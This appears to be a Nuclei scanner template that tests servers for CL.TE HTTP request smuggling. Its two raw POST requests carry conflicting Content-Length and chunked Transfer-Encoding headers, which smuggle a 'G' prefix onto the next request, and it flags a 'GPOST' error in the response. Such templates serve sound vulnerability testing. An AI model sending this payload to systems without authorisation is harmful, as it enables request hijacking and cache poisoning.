id: cl-te-http-request-smuggling

info:
  name: CL.TE HTTP request smuggling
  author: pdteam, akincibor
  metadata:
    verified: true
  severity: low
  reference:
    - https://portswigger.net/web-security/request-smuggling
  tags: vuln,vulnerabilities,smuggling

requests:
  - raw:
    - |+
      POST / HTTP/1.1
      Host: {{Hostname}}
      Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 6
      Transfer-Encoding: chunked

      0

      G
    - |+
      POST / HTTP/1.1
      Host: {{Hostname}}
      Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 6
      Transfer-Encoding: chunked

      0

      G

    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Unrecognized method GPOST")'
